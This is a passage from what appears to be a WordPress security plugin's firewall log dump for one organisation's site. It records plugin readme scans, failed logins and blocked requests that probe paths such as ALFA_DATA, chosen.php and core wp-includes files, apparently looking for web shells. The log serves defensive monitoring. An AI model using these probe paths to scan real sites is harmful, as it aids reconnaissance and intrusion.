scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9odC1tZWdhLWZvci1lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9odC1tZWdhLWZvci1lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134431,1700136543.643699,1700136543.638600,0x00000000000000000000FFFFA305D256,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/ht-mega-for-elementor/readme.txt',NULL,'Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9odC1tZWdhLWZvci1lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9odC1tZWdhLWZvci1lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134433,0.000000,1700137353.108718,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134434,0.000000,1700137995.270886,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134435,1700138254.024150,1700138254.016200,0x00000000000000000000FFFFA305D256,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/wp-post-author/readme.txt',NULL,'Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wb3N0LWF1dGhvci9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wb3N0LWF1dGhvci9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134432,0.000000,1700136714.431642,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134450,1700142945.201135,1700142945.189900,0x00000000000000000000FFFFA305D256,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/ultimate-member/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bHRpbWF0ZS1tZW1iZXIvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134451,0.000000,1700143325.899921,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134452,1700143479.500843,1700143479.491800,0x00000000000000000000FFFF540F2DA3,0,403,0,0,0,'https://eckankar-colorado.org/chosen.php?p=','eckankar-colorado.org','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) colonel Chrome/196.3.1597.530 Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgY29sb25lbCBDaHJvbWUvMTk2LjMuMTU5Ny41MzAgU2FmYXJpLzUzNy4zNg==\",\"path\":\"L2Nob3Nlbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134456,1700145264.441527,1700145264.432300,0x00000000000000000000FFFFA305D256,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt',NULL,'Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lc3NlbnRpYWwtYWRkb25zLWZvci1lbGVtZW50b3ItbGl0ZS9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134459,0.000000,1700146645.156783,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134460,1700146731.267635,1700146731.258900,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/cgi-bin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4v\",\"category\":\"brute-force\",\"ssl\":1}'),(134457,0.000000,1700145321.845907,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134458,0.000000,1700145985.156605,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134461,1700146729.958410,1700146729.936500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/blog/wp-includes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtaW5jbHVkZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134462,1700146728.204211,1700146728.192700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/assets/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Fzc2V0cy9pbWFnZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134463,1700146726.399180,1700146726.390300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/admin/controller/extension/extension/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134464,1700146724.543646,1700146724.535000,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/WordPress/wp-admin/includes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L1dvcmRQcmVzcy93cC1hZG1pbi9pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134465,1700146722.493155,1700146722.484500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/ALFA_DATA/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0FMRkFfREFUQS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134466,1700146720.518283,1700146720.509500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/.well-knownold/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3dub2xkLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134467,1700146719.073036,1700146719.061700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/.well-known/pkivalidation/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL3BraXZhbGlkYXRpb24v\",\"category\":\"brute-force\",\"ssl\":1}'),(134468,1700146716.280600,1700146716.271800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/.well-known/acme-challenge/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL2FjbWUtY2hhbGxlbmdlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134469,1700146712.265060,1700146712.256300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-templates.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXRlbXBsYXRlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134470,1700146710.771697,1700146710.756400,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-previews.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXByZXZpZXdzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134471,1700146709.273574,1700146709.264800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/template-canvas.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RlbXBsYXRlLWNhbnZhcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134472,1700146707.250080,1700146707.241200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/style-engine.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLWVuZ2luZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134473,1700146705.615032,1700146705.606300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134474,1700146703.835345,1700146703.826700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wpdb.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwZGIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134475,1700146702.029757,1700146702.021100,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-theme-json.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLWpzb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134476,1700146699.965441,1700146699.956500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-styles.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXN0eWxlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134477,1700146698.066097,1700146698.054100,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-scripts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXNjcmlwdHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134478,1700146696.224073,1700146696.214500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134479,1700146694.150548,1700146694.141200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-duotone.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWR1b3RvbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134480,1700146692.411165,1700146692.398200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-template.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134481,1700146690.043519,1700146690.021900,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-editor.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 